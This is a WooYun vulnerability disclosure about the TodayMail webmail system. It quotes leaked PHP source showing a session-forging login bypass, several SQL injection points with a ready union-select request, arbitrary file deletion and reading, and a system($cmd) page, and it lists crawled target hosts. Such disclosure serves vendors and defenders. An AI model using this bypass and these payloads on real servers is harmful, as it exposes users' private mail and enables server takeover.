当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0188026

漏洞标题:TodayMail邮件系统涉及缺陷可导致多个漏洞(任意邮件读取/SQL注入漏洞/命令执行/任意文件删除)

相关厂商:广东时代互联科技有限公司

漏洞作者: 路人甲

提交时间:2016-03-23 11:05

修复时间:2016-06-21 12:00

公开时间:2016-06-21 12:00

漏洞类型:远程代码执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-23: 细节已通知厂商并且等待厂商处理中
2016-03-23: 厂商已经确认,细节仅向厂商公开
2016-03-26: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-05-17: 细节向核心白帽子及相关领域专家公开
2016-05-27: 细节向普通白帽子公开
2016-06-06: 细节向实习白帽子公开
2016-06-21: 细节向公众公开

简要描述:

ps:已按照审核要求补充案例进行说明
TodayMail邮件系统涉及缺陷可导致多个漏洞(任意邮件读取/N处SQL注入漏洞/命令执行/任意文件删除)无需登录,直接shell
http://www.wooyun.org/bugs/wooyun-2014-063422
通过此处获取了源代码(以前泄露)

详细说明:

http://**.**.**.**/bugs/wooyun-2014-063422
通过此处获取了源代码(以前泄露)
进入webmail\main文件夹下
所有代码均加载了

<?php
/*-
 * PROMailVIP webmail 
 * 
 * Copyright (c) 1999-2001 by PROMailVIP network system Inc.
 * All rights reserved.
 * Author: Sanry William <sanry@**.**.**.**>
 *
 * $Id: getpopmail.php,v 1.6 2003/01/16 03:23:50 sanry Exp $
 * modify by keenx 2005.3.9
 */
header("Content-Type: text/html; charset=utf-8");
//$DEBUG = 1;
//if($DEBUG) $timebegin = gettimeofday();
include_once "../include/login_inc.php";
include_once "../config/config_inc.php";
include_once "../config/dbremote.inc.php";
include_once "../language/utf8_inc.php";
include_once "../../core/emailcore.class.inc.php";
include_once "../../core/emailutil.inc.php";


其中login_inc.php为核心权限验证文件

<?php
/*-
 * PROMailVIP webmail 
 * Copyright (c) 1999-2004 by PROMailVIP network system Inc.
 * All rights reserved.
 * Author: sanry <sanry@**.**.**.**>
 * $Id: login_inc.php,v 1.8 2004/07/02 03:09:52 sanry Exp $
 * 所有文件已经移到子文件夹下,所以使用Location: ../login.php 2005-9-2 keenx
 */
if(!defined("INCLUDE_LOGIN_OK")) {
	defined("INCLUDE_LOGIN_OK");
	session_start();
	$G_USERNAME = $_SESSION['G_USERNAME'];
	//echo $G_USERNAME;
	$G_DOMAIN = $_SESSION['G_DOMAIN'];
	$G_HOME = $_SESSION['G_HOME'];
	//$G_TIME = $_SESSION['G_TIME'];
	//$G_QUOTA = $_SESSION['G_QUOTA'];
	$G_NICKNAME = $_SESSION['G_NICKNAME'];
	$G_ID = $_SESSION['G_ID'];
	$G_LANG = $_SESSION['G_LANG'];
	$G_TEMP = $_SESSION['G_TEMP'];
	if ( !$G_USERNAME ){
		echo "<script language=\"javascript\">window.top.location.href='../login.php';</script>";
	  //  header("Location: ../login.php");
		exit();
 	/*
	if ( !$G_USERNAME || !$G_DOMAIN || !$G_HOME || !$G_TIME|| !$G_QUOTA  ){
	     header("Location: login.php");
		exit();
	*/
	}
} // End of INCLUDE_LOGIN_OK
?>


通过上面可知,$G_USERNAME 变量就是控制整个邮件登录过程的唯一因素,而$G_USERNAME的来源为session方式赋值,所以目前来看,无法绕过。
但是通过对所有代码进行审计
发现如下位置
webmail/main/mailcurlapi.php
webmail/main/sendstatusapi.php

<?php
header("Content-Type:  text/html;charset=utf-8");
include_once "../config/config_inc.php";
include_once "../config/dbremote.inc.php";
include_once "../language/utf8_inc.php";
include_once "../../core/emailcore.class.inc.php";
include_once "../../core/emailutil.inc.php";
include_once "../../core/send.class.inc.php";
set_time_limit(0);
session_start();
$G_USERNAME = $_SESSION['G_USERNAME'] = $_POST['G_USERNAME'] ? $_POST['G_USERNAME'] : 'monitor';
$G_DOMAIN = $_SESSION['G_DOMAIN']   = $_POST['G_DOMAIN'] ? $_POST['G_DOMAIN'] : '**.**.**.**';
$_SESSION['G_HOME']     = $_POST['G_HOME'] ? $_POST['G_HOME'] : '/tmdomains/m/**.**.**.**/monitor';
$_SESSION['G_NICKNAME'] = $_POST['G_NICKNAME'] ? $_POST['G_NICKNAME'] : 'monitor';
$G_ID = $_SESSION['G_ID']       = $_POST['G_ID'] ? $_POST['G_ID'] : '4458';
$_SESSION['G_LANG']     = $_POST['G_LANG'] ? $_POST['G_LANG'] : 0;
$_SESSION['G_TEMP']     = NULL;
include_once "../include/login_inc.php";//登陆等安全检测
$value 	 = $_POST['sendto'];
$subject = $_POST['subject'];
$content = $_POST['content']; 
if(!$value){echo '没有邮箱';exit;}


我们可以看到直接对session值进行了操作,以post方式进行赋值,在后续

include_once "../include/login_inc.php";//登陆等安全检测

又进行了权限验证。
这是什么逻辑? 这就导致直接绕过邮箱验证,直接可登陆邮箱,造成任意邮件读取。
所以后台所有页面操作,均可以采用如下方式绕过赋值
一、任意邮件读取
通过POST提交方式即可构造G_USERNAME G_DOMAIN G_HOME G_NICKNAME G_ID即可绕过登陆任意人邮箱
二SQL注入漏洞(举10例分析)
1、webmail/tools/getpopmail.php

<?php
/*-
 * PROMailVIP webmail 
 * 
 * Copyright (c) 1999-2001 by PROMailVIP network system Inc.
 * All rights reserved.
 * Author: Sanry William <sanry@**.**.**.**>
 *
 * $Id: getpopmail.php,v 1.6 2003/01/16 03:23:50 sanry Exp $
 * modify by keenx 2005.3.9
 */
header("Content-Type: text/html; charset=utf-8");
//$DEBUG = 1;
//if($DEBUG) $timebegin = gettimeofday();
include_once "../include/login_inc.php";
include_once "../config/config_inc.php";
include_once "../config/dbremote.inc.php";
include_once "../language/utf8_inc.php";
include_once "../../core/emailcore.class.inc.php";
include_once "../../core/emailutil.inc.php";
//get
$get_Cmd = trim($_GET['Cmd']);
$popid=trim($_GET['popid']);
$EmailCore = new EmailCore($G_ID);
if($get_Cmd=='Get')
{
	$Total = $EmailCore->getPOPTotal();
	if($popid=='all')
		$POPList = $EmailCore->getPOPList(1);
	else $POPList=$EmailCore->getPOPlist(1,1," and popid=$popid");
	if(!$POPList){
		echo $LANG_POP_NOT_MAIL.'!<a href="../setting/setpopmail.php" style="color:#0000FF">'+$LANG_POP_CILCK_ADD+'</a>';
	}


popid为注入点,
2、webmail\tools\cardList.php

<?php
header("Content-Type: text/html; charset=utf-8");
$DEBUG = 1;
include_once "../include/login_inc.php";
include_once "../config/config_inc.php";
include_once "../config/dbremote.inc.php";
include_once "../language/utf8_inc.php";
include_once "../../core/emailcore.class.inc.php";
include_once "../../core/emailutil.inc.php";
// 每页显示的行数 10
$CFG_ADDR_NUMPERPAGE = 10;
 
/////查询列表
$key = mysql_real_escape_string($_REQUEST['key']);
if ($key) $sql_plus = " AND (name LIKE '%$key%' or cname LIKE '%$key%' or email LIKE '%$key%' or ".
	"addr LIKE '%$key%' or job LIKE '%$key%' or tel LIKE '%$key%' or mobile LIKE '%$key%' or note LIKE '%$key%') ";
else
	$sqlwhere = "";
	
//////排序处理
if($_REQUEST[sort_by]) $orderby = "order by $_REQUEST[sort_by] asc";
if(!$orderby) $orderby = "order by cardid desc";
$EmailCore = new EmailCore($G_ID);
/////总列表


$_REQUEST[sort_by] 注入,此处为order by 注入
3、webmail\tools\cardCmd.php

<?php
header("Content-Type: text/html; charset=utf-8");
include_once "../include/login_inc.php";
include_once "../config/config_inc.php";
include_once "../config/dbremote.inc.php";
include_once "../language/utf8_inc.php";
include_once "../../core/emailcore.class.inc.php";
include_once "../../core/emailutil.inc.php";
$get_Cmd = $_REQUEST[cmd];
$CardID = $_REQUEST[cardid];
$EmailCore = new EmailCore($G_ID);
if(!preg_match("/[0-9]/",$_REQUEST[agid]))$_REQUEST[agid]='';
if($get_Cmd == "add")
{
	$CardInfo = array();
	$CardInfo['name'] = $_REQUEST[name];
	$CardInfo['cname'] = $_REQUEST[cname];
	$CardInfo['addr'] = $_REQUEST[addr];
	$CardInfo['job'] = $_REQUEST[job];
	$CardInfo['tel'] = $_REQUEST[tel];
	$CardInfo['PhoneNum'] = $_REQUEST[PhoneNum];
	$CardInfo['email'] = $_REQUEST[email];
	$CardInfo['ag_id'] = $_REQUEST[agid];
	$CardInfo['note'] = $_REQUEST[note];
	$res = $EmailCore->insertAddress($CardInfo);
}


跟踪insertAddress方法

function insertAddress($addressInfo){
		foreach($addressInfo as $key=>$val) {
			$key = mysql_real_escape_string($key);
			$val = mysql_real_escape_string($val);
			if($key=="ag_id"){
				if($val!="") $sql_plus .= ", $key=$val";
				else $sql_plus .= ", $key=null";
			}
			else	$sql_plus .= ", $key='$val'";
		}
		$sql="insert into address set ftm_id=".$this->TMID.$sql_plus;
		$this->mysql->query($sql);
		return true;
	}


在这里的$this->TMID又是前面我们伪造session值的

new EmailCore($G_ID);


$G_ID即为我们可控的值,又是注入
三、任意文件删除
webmail\main\doAction.php

case "del":
		$name=(isset($_POST['name']) and $_POST['name'])?$_POST['name']:"";
		$EmailCore->deleteAttach($name,$sendBasePath);


跟踪方法deleteAttach

function deleteAttach($filename,$sendBasePath='')
	{
		if(!$sendBasePath) $sendBasePath = $this->getTMBasePath()."/sendfile/attach/".session_id();
		$listattachfile = "$sendBasePath/list_attach";
		$listattachfileTEMP = "$sendBasePath/list_attach_tmp";
		($FD_LIST_ATTACH = fopen($listattachfile,"r")) || die(__FUNCTION__." ".__LINE__." "."Error open $listattachfile!");
		($FD_LIST_ATTACH_TEMP = fopen($listattachfileTEMP,"w")) || die(__FUNCTION__." ".__LINE__." "."Error open $listattachfileTEMP!");
		while( $buff = fgets($FD_LIST_ATTACH,1024) ){
			list($name,$size,) = preg_split("/\t/",$buff,3);
			if ($name!=$filename) fputs($FD_LIST_ATTACH_TEMP,$buff);
		}
		fclose($FD_LIST_ATTACH);
		fclose($FD_LIST_ATTACH_TEMP);
		if(file_exists("$sendBasePath/$filename")) unlink("$sendBasePath/$filename");
		unlink($listattachfile);
		rename($listattachfileTEMP, $listattachfile);
	}


四、命令执行

行号           文件代码
1 <?
2 //by sanry 2005.07.01  v1.0
3 //last modify by frank 2005-07-11 11:52
4 
5 include "security.inc.php";
6 if(!$cmd)$cmd="ls";
7 ?>
8 <html>
9 <table>
10  <tr>
11 	<td>
12 	  <a href="<?=$PHP_SELF?>?cmd=ifconfig">��������</a>&nbsp;
13 	  <a href="<?=$PHP_SELF?>?cmd=dmesg">��Ӳ��״̬</a>&nbsp;
14 	  <a href="<?=$PHP_SELF?>?cmd=netstat -n">�������</a>&nbsp;
15 	  <a href="<?=$PHP_SELF?>?cmd=uptime">CPU״̬</a>&nbsp;
16 	  <a href="<?=$PHP_SELF?>?cmd=ps aux">�����б�</a>&nbsp;
17 	  <a href="<?=$PHP_SELF?>?cmd=lsof">���ļ��б�</a>&nbsp;
18 	  <a href="<?=$PHP_SELF?>?cmd=df">��������</a>&nbsp;
19 	  <a href="<?=$PHP_SELF?>?cmd=free">�ڴ�ʹ��</a>&nbsp;
20 	  <a href="<?=$PHP_SELF?>?cmd=cat /var/log/boot.msg">����ռ�</a>
21    </td>
22  </tr>
23  <tr>
24    <td>
25 	<form action="<?=$PHP_SELF?>">		
26 		<input type=submit value="����">
27 		<input type=text name="cmd" size="100" value="<?=$cmd?>">
28 	</form>
29 	</td>
30  </tr>
31 </table>
32 <textarea rows="50" style="width:90%"><?system($cmd);?></textarea>
33 </html>


include "security.inc.php";


require_once("../api/netaddr/ipcheck.inc.php");
 $ipcheck=new IPCheck();
 $arrnew=array(
 "0"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**") ,
 "1"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**") ,
 "2"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**") ,
 "3"=> array("ip"=>"**.**.**.**",  "mask"=>"**.**.**.**"),
 "4"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**"),
 "5"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**"),
 "6"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**"),
 "7"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**"),
 );
 
 $ipcheck->setipfilters($arrnew);
 //echo "REMOTE_ADDR: ".$REMOTE_ADDR."<br>";	//tesing,add by frank 2005-07-27 15:29
 if(!$ipcheck->checkip($_SERVER[REMOTE_ADDR]) ){
	echo "authorization is permission error($_SERVER[REMOTE_ADDR])";
	exit;
 }
?>


五、任意文件读取
mail\webmail\main\mime.php

<?php
/*-
 * PROMailVIP webmail
 *
 * Copyright (c) 1999-2001 by PROMailVIP network system Inc.
 * All rights reserved.
 * Author: Sanry William <sanry@**.**.**.**>
 *
 * $Id: mime.php,v 1.8 2003/05/16 00:36:29 sanry Exp $
 * Modify by keenx 2005-7-19
 */
ob_start(); 
header("Content-Type: text/html; charset=utf-8");
include_once "../include/login_inc.php";
include_once "../config/config_inc.php";
include_once "../config/dbremote.inc.php";
include_once "../../core/emailcore.class.inc.php";
include_once "../../core/emailutil.inc.php";
include_once "../language/utf8_inc.php";
include_once "../include/mimeType.php";
//get
foreach($_REQUEST as $key=>$val){
	$$key=trim($val);
}
$get_File = rawurldecode($_REQUEST['File']);
$get_Cmd = $_REQUEST['Cmd'];
$get_ID = $_REQUEST['id'];
$EmailCore = new EmailCore($G_ID);
$BodyInfo = $EmailCore->getBodyInfo();
if ($get_Cmd=="ShowByMD5"){
	ob_end_clean();
	@mysql_close($db);
	@mysql_close($db_remote);
	$filePath = $EmailCore->getTMBasePath().'/sendfile/attach/'.session_id().'/'.$get_File;
	if(is_file($filePath)){
		echo file_get_contents($filePath);
		exit;
	}
	$filePath = $EmailCore->getTMBasePath().'/bodyfile/'.$get_File;
	if(is_file($filePath)){
		echo file_get_contents($filePath);
		exit;
	}
	exit;


演示如下:
默认访问http://**.**.**.**/webmail/tools/getpopmail.php?Cmd=Get&popid=1

11.png


即为跳转,所以我么通过如下方式先赋值session

22.png


再次访问

33.png


http://**.**.**.**/webmail/tools/getpopmail.php?Cmd=Get&popid=1 and 1=2 union select 1,2,3,4,user(),6,7,8

44.png


777.png


案例

666.png


通过写个爬虫把所有邮箱爬下来
mx620.**.**.**.**
**.**.**.**
mx603.**.**.**.**
**.**.**.**
mx606.**.**.**.**
mx622.**.**.**.**
mx605.**.**.**.**
mx623.**.**.**.**
**.**.**.**
mx621.**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
mx600.**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
mx601.**.**.**.**
**.**.**.**
**.**.**.**
webmail.**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
mx620.**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
mx623hk.**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**/
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**

漏洞证明:

http://**.**.**.**/bugs/wooyun-2014-063422
通过此处获取了源代码(以前泄露)
进入webmail\main文件夹下
所有代码均加载了

<?php
/*-
 * PROMailVIP webmail 
 * 
 * Copyright (c) 1999-2001 by PROMailVIP network system Inc.
 * All rights reserved.
 * Author: Sanry William <sanry@**.**.**.**>
 *
 * $Id: getpopmail.php,v 1.6 2003/01/16 03:23:50 sanry Exp $
 * modify by keenx 2005.3.9
 */
header("Content-Type: text/html; charset=utf-8");
//$DEBUG = 1;
//if($DEBUG) $timebegin = gettimeofday();
include_once "../include/login_inc.php";
include_once "../config/config_inc.php";
include_once "../config/dbremote.inc.php";
include_once "../language/utf8_inc.php";
include_once "../../core/emailcore.class.inc.php";
include_once "../../core/emailutil.inc.php";


其中login_inc.php为核心权限验证文件

<?php
/*-
 * PROMailVIP webmail 
 * Copyright (c) 1999-2004 by PROMailVIP network system Inc.
 * All rights reserved.
 * Author: sanry <sanry@**.**.**.**>
 * $Id: login_inc.php,v 1.8 2004/07/02 03:09:52 sanry Exp $
 * 所有文件已经移到子文件夹下,所以使用Location: ../login.php 2005-9-2 keenx
 */
if(!defined("INCLUDE_LOGIN_OK")) {
	defined("INCLUDE_LOGIN_OK");
	session_start();
	$G_USERNAME = $_SESSION['G_USERNAME'];
	//echo $G_USERNAME;
	$G_DOMAIN = $_SESSION['G_DOMAIN'];
	$G_HOME = $_SESSION['G_HOME'];
	//$G_TIME = $_SESSION['G_TIME'];
	//$G_QUOTA = $_SESSION['G_QUOTA'];
	$G_NICKNAME = $_SESSION['G_NICKNAME'];
	$G_ID = $_SESSION['G_ID'];
	$G_LANG = $_SESSION['G_LANG'];
	$G_TEMP = $_SESSION['G_TEMP'];
	if ( !$G_USERNAME ){
		echo "<script language=\"javascript\">window.top.location.href='../login.php';</script>";
	  //  header("Location: ../login.php");
		exit();
 	/*
	if ( !$G_USERNAME || !$G_DOMAIN || !$G_HOME || !$G_TIME|| !$G_QUOTA  ){
	     header("Location: login.php");
		exit();
	*/
	}
} // End of INCLUDE_LOGIN_OK
?>


通过上面可知,$G_USERNAME 变量就是控制整个邮件登录过程的唯一因素,而$G_USERNAME的来源为session方式赋值,所以目前来看,无法绕过。
但是通过对所有代码进行审计
发现如下位置
webmail/main/mailcurlapi.php
webmail/main/sendstatusapi.php

<?php
header("Content-Type:  text/html;charset=utf-8");
include_once "../config/config_inc.php";
include_once "../config/dbremote.inc.php";
include_once "../language/utf8_inc.php";
include_once "../../core/emailcore.class.inc.php";
include_once "../../core/emailutil.inc.php";
include_once "../../core/send.class.inc.php";
set_time_limit(0);
session_start();
$G_USERNAME = $_SESSION['G_USERNAME'] = $_POST['G_USERNAME'] ? $_POST['G_USERNAME'] : 'monitor';
$G_DOMAIN = $_SESSION['G_DOMAIN']   = $_POST['G_DOMAIN'] ? $_POST['G_DOMAIN'] : '**.**.**.**';
$_SESSION['G_HOME']     = $_POST['G_HOME'] ? $_POST['G_HOME'] : '/tmdomains/m/**.**.**.**/monitor';
$_SESSION['G_NICKNAME'] = $_POST['G_NICKNAME'] ? $_POST['G_NICKNAME'] : 'monitor';
$G_ID = $_SESSION['G_ID']       = $_POST['G_ID'] ? $_POST['G_ID'] : '4458';
$_SESSION['G_LANG']     = $_POST['G_LANG'] ? $_POST['G_LANG'] : 0;
$_SESSION['G_TEMP']     = NULL;
include_once "../include/login_inc.php";//登陆等安全检测
$value 	 = $_POST['sendto'];
$subject = $_POST['subject'];
$content = $_POST['content']; 
if(!$value){echo '没有邮箱';exit;}


我们可以看到直接对session值进行了操作,以post方式进行赋值,在后续

include_once "../include/login_inc.php";//登陆等安全检测

又进行了权限验证。
这是什么逻辑? 这就导致直接绕过邮箱验证,直接可登陆邮箱,造成任意邮件读取。
所以后台所有页面操作,均可以采用如下方式绕过赋值
一、任意邮件读取
通过POST提交方式即可构造G_USERNAME G_DOMAIN G_HOME G_NICKNAME G_ID即可绕过登陆任意人邮箱
二SQL注入漏洞(举10例分析)
1、webmail/tools/getpopmail.php

<?php
/*-
 * PROMailVIP webmail 
 * 
 * Copyright (c) 1999-2001 by PROMailVIP network system Inc.
 * All rights reserved.
 * Author: Sanry William <sanry@**.**.**.**>
 *
 * $Id: getpopmail.php,v 1.6 2003/01/16 03:23:50 sanry Exp $
 * modify by keenx 2005.3.9
 */
header("Content-Type: text/html; charset=utf-8");
//$DEBUG = 1;
//if($DEBUG) $timebegin = gettimeofday();
include_once "../include/login_inc.php";
include_once "../config/config_inc.php";
include_once "../config/dbremote.inc.php";
include_once "../language/utf8_inc.php";
include_once "../../core/emailcore.class.inc.php";
include_once "../../core/emailutil.inc.php";
//get
$get_Cmd = trim($_GET['Cmd']);
$popid=trim($_GET['popid']);
$EmailCore = new EmailCore($G_ID);
if($get_Cmd=='Get')
{
	$Total = $EmailCore->getPOPTotal();
	if($popid=='all')
		$POPList = $EmailCore->getPOPList(1);
	else $POPList=$EmailCore->getPOPlist(1,1," and popid=$popid");
	if(!$POPList){
		echo $LANG_POP_NOT_MAIL.'!<a href="../setting/setpopmail.php" style="color:#0000FF">'+$LANG_POP_CILCK_ADD+'</a>';
	}


popid为注入点,
2、webmail\tools\cardList.php

<?php
header("Content-Type: text/html; charset=utf-8");
$DEBUG = 1;
include_once "../include/login_inc.php";
include_once "../config/config_inc.php";
include_once "../config/dbremote.inc.php";
include_once "../language/utf8_inc.php";
include_once "../../core/emailcore.class.inc.php";
include_once "../../core/emailutil.inc.php";
// 每页显示的行数 10
$CFG_ADDR_NUMPERPAGE = 10;
 
/////查询列表
$key = mysql_real_escape_string($_REQUEST['key']);
if ($key) $sql_plus = " AND (name LIKE '%$key%' or cname LIKE '%$key%' or email LIKE '%$key%' or ".
	"addr LIKE '%$key%' or job LIKE '%$key%' or tel LIKE '%$key%' or mobile LIKE '%$key%' or note LIKE '%$key%') ";
else
	$sqlwhere = "";
	
//////排序处理
if($_REQUEST[sort_by]) $orderby = "order by $_REQUEST[sort_by] asc";
if(!$orderby) $orderby = "order by cardid desc";
$EmailCore = new EmailCore($G_ID);
/////总列表


$_REQUEST[sort_by] 注入,此处为order by 注入
3、webmail\tools\cardCmd.php

<?php
header("Content-Type: text/html; charset=utf-8");
include_once "../include/login_inc.php";
include_once "../config/config_inc.php";
include_once "../config/dbremote.inc.php";
include_once "../language/utf8_inc.php";
include_once "../../core/emailcore.class.inc.php";
include_once "../../core/emailutil.inc.php";
$get_Cmd = $_REQUEST[cmd];
$CardID = $_REQUEST[cardid];
$EmailCore = new EmailCore($G_ID);
if(!preg_match("/[0-9]/",$_REQUEST[agid]))$_REQUEST[agid]='';
if($get_Cmd == "add")
{
	$CardInfo = array();
	$CardInfo['name'] = $_REQUEST[name];
	$CardInfo['cname'] = $_REQUEST[cname];
	$CardInfo['addr'] = $_REQUEST[addr];
	$CardInfo['job'] = $_REQUEST[job];
	$CardInfo['tel'] = $_REQUEST[tel];
	$CardInfo['PhoneNum'] = $_REQUEST[PhoneNum];
	$CardInfo['email'] = $_REQUEST[email];
	$CardInfo['ag_id'] = $_REQUEST[agid];
	$CardInfo['note'] = $_REQUEST[note];
	$res = $EmailCore->insertAddress($CardInfo);
}


跟踪insertAddress方法

function insertAddress($addressInfo){
		foreach($addressInfo as $key=>$val) {
			$key = mysql_real_escape_string($key);
			$val = mysql_real_escape_string($val);
			if($key=="ag_id"){
				if($val!="") $sql_plus .= ", $key=$val";
				else $sql_plus .= ", $key=null";
			}
			else	$sql_plus .= ", $key='$val'";
		}
		$sql="insert into address set ftm_id=".$this->TMID.$sql_plus;
		$this->mysql->query($sql);
		return true;
	}


在这里的$this->TMID又是前面我们伪造session值的

new EmailCore($G_ID);


$G_ID即为我们可控的值,又是注入
三、任意文件删除
webmail\main\doAction.php

case "del":
		$name=(isset($_POST['name']) and $_POST['name'])?$_POST['name']:"";
		$EmailCore->deleteAttach($name,$sendBasePath);


跟踪方法deleteAttach

function deleteAttach($filename,$sendBasePath='')
	{
		if(!$sendBasePath) $sendBasePath = $this->getTMBasePath()."/sendfile/attach/".session_id();
		$listattachfile = "$sendBasePath/list_attach";
		$listattachfileTEMP = "$sendBasePath/list_attach_tmp";
		($FD_LIST_ATTACH = fopen($listattachfile,"r")) || die(__FUNCTION__." ".__LINE__." "."Error open $listattachfile!");
		($FD_LIST_ATTACH_TEMP = fopen($listattachfileTEMP,"w")) || die(__FUNCTION__." ".__LINE__." "."Error open $listattachfileTEMP!");
		while( $buff = fgets($FD_LIST_ATTACH,1024) ){
			list($name,$size,) = preg_split("/\t/",$buff,3);
			if ($name!=$filename) fputs($FD_LIST_ATTACH_TEMP,$buff);
		}
		fclose($FD_LIST_ATTACH);
		fclose($FD_LIST_ATTACH_TEMP);
		if(file_exists("$sendBasePath/$filename")) unlink("$sendBasePath/$filename");
		unlink($listattachfile);
		rename($listattachfileTEMP, $listattachfile);
	}


四、命令执行

行号           文件代码
1 <?
2 //by sanry 2005.07.01  v1.0
3 //last modify by frank 2005-07-11 11:52
4 
5 include "security.inc.php";
6 if(!$cmd)$cmd="ls";
7 ?>
8 <html>
9 <table>
10  <tr>
11 	<td>
12 	  <a href="<?=$PHP_SELF?>?cmd=ifconfig">��������</a>&nbsp;
13 	  <a href="<?=$PHP_SELF?>?cmd=dmesg">��Ӳ��״̬</a>&nbsp;
14 	  <a href="<?=$PHP_SELF?>?cmd=netstat -n">�������</a>&nbsp;
15 	  <a href="<?=$PHP_SELF?>?cmd=uptime">CPU״̬</a>&nbsp;
16 	  <a href="<?=$PHP_SELF?>?cmd=ps aux">�����б�</a>&nbsp;
17 	  <a href="<?=$PHP_SELF?>?cmd=lsof">���ļ��б�</a>&nbsp;
18 	  <a href="<?=$PHP_SELF?>?cmd=df">��������</a>&nbsp;
19 	  <a href="<?=$PHP_SELF?>?cmd=free">�ڴ�ʹ��</a>&nbsp;
20 	  <a href="<?=$PHP_SELF?>?cmd=cat /var/log/boot.msg">����ռ�</a>
21    </td>
22  </tr>
23  <tr>
24    <td>
25 	<form action="<?=$PHP_SELF?>">		
26 		<input type=submit value="����">
27 		<input type=text name="cmd" size="100" value="<?=$cmd?>">
28 	</form>
29 	</td>
30  </tr>
31 </table>
32 <textarea rows="50" style="width:90%"><?system($cmd);?></textarea>
33 </html>


include "security.inc.php";


require_once("../api/netaddr/ipcheck.inc.php");
 $ipcheck=new IPCheck();
 $arrnew=array(
 "0"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**") ,
 "1"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**") ,
 "2"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**") ,
 "3"=> array("ip"=>"**.**.**.**",  "mask"=>"**.**.**.**"),
 "4"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**"),
 "5"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**"),
 "6"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**"),
 "7"=> array("ip"=>"**.**.**.**","mask"=>"**.**.**.**"),
 );
 
 $ipcheck->setipfilters($arrnew);
 //echo "REMOTE_ADDR: ".$REMOTE_ADDR."<br>";	//tesing,add by frank 2005-07-27 15:29
 if(!$ipcheck->checkip($_SERVER[REMOTE_ADDR]) ){
	echo "authorization is permission error($_SERVER[REMOTE_ADDR])";
	exit;
 }
?>


五、任意文件读取
mail\webmail\main\mime.php

<?php
/*-
 * PROMailVIP webmail
 *
 * Copyright (c) 1999-2001 by PROMailVIP network system Inc.
 * All rights reserved.
 * Author: Sanry William <sanry@**.**.**.**>
 *
 * $Id: mime.php,v 1.8 2003/05/16 00:36:29 sanry Exp $
 * Modify by keenx 2005-7-19
 */
ob_start(); 
header("Content-Type: text/html; charset=utf-8");
include_once "../include/login_inc.php";
include_once "../config/config_inc.php";
include_once "../config/dbremote.inc.php";
include_once "../../core/emailcore.class.inc.php";
include_once "../../core/emailutil.inc.php";
include_once "../language/utf8_inc.php";
include_once "../include/mimeType.php";
//get
foreach($_REQUEST as $key=>$val){
	$$key=trim($val);
}
$get_File = rawurldecode($_REQUEST['File']);
$get_Cmd = $_REQUEST['Cmd'];
$get_ID = $_REQUEST['id'];
$EmailCore = new EmailCore($G_ID);
$BodyInfo = $EmailCore->getBodyInfo();
if ($get_Cmd=="ShowByMD5"){
	ob_end_clean();
	@mysql_close($db);
	@mysql_close($db_remote);
	$filePath = $EmailCore->getTMBasePath().'/sendfile/attach/'.session_id().'/'.$get_File;
	if(is_file($filePath)){
		echo file_get_contents($filePath);
		exit;
	}
	$filePath = $EmailCore->getTMBasePath().'/bodyfile/'.$get_File;
	if(is_file($filePath)){
		echo file_get_contents($filePath);
		exit;
	}
	exit;


演示如下:
默认访问http://**.**.**.**/webmail/tools/getpopmail.php?Cmd=Get&popid=1

11.png


即为跳转,所以我么通过如下方式先赋值session

22.png


再次访问

33.png


http://**.**.**.**/webmail/tools/getpopmail.php?Cmd=Get&popid=1 and 1=2 union select 1,2,3,4,user(),6,7,8

44.png


777.png


案例

666.png


通过写个爬虫把所有邮箱爬下来
mx620.**.**.**.**
**.**.**.**
mx603.**.**.**.**
**.**.**.**
mx606.**.**.**.**
mx622.**.**.**.**
mx605.**.**.**.**
mx623.**.**.**.**
**.**.**.**
mx621.**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
mx600.**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
mx601.**.**.**.**
**.**.**.**
**.**.**.**
webmail.**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
mx620.**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
mx623hk.**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**/
**.**.**.**
**.**.**.**
**.**.**.**
**.**.**.**

修复方案:

